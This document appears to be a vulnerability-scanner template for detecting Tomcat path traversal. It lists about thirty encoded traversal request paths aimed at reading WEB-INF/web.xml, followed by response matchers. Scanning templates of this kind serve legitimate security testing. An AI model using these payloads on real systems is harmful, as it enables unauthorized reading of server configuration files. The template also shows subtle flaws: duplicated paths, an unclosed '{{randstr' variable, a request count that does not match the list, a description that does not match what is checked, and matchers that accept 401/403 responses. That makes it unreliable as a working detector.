id: java_server_taversal

info:
  name: Tomcat Path Traversal Detection
  author: xandsz
  severity: medium
  description: Detects Tomcat path traversal vulnerabilities leading to unauthorized access to the Manager or Host-Manager interfaces.
  metadata:
    max-request: 29
    shodan-query: "html:\"error.log\""
  tags: tomcat, traversal, path-traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/%5C../WEB-INF/web.xml"
      - "{{BaseURL}}/;;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/%5C../WEB-INF/web.xml"
      - "{{BaseURL}}/;;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/./../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
      - "{{BaseURL}}/demo/../WEB-INF/web.xml"
      - "{{BaseURL}}/wiki/struts/..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}/wiki/struts/..%252f..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..%3B/WEB-INF/web.xml"
      - "{{BaseURL}}/..%253B/WEB-INF/web.xml"
      - "{{BaseURL}}/plugins//../WEB-INF/web.xml%C0%80.jsp"
      - "{{BaseURL}}/js/app//../WEB-INF/web.xml%C0%80.jsp"
      - "{{BaseURL}}/js/app//../WEB-INF/web.xml"
      - "{{BaseURL}}/js/app//../../WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/js/app/../../WEB-INF/web.xml%3bx%3d/"
      - "{{BaseURL}}/js/app/1//../../WEB-INF/web.xml%C0%80.jsp"
      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/{{randstr/WEB-INF/web.xml;x="
      - "{{BaseURL}}/..;/WEB-INF/web.xml;x="
      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
      - "{{BaseURL}}/%C0%AE/WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae%c0%ae/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<servlet-name>default</servlet-name>'
          - '<web-app xmlns='
      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 403
          - 401
          - 200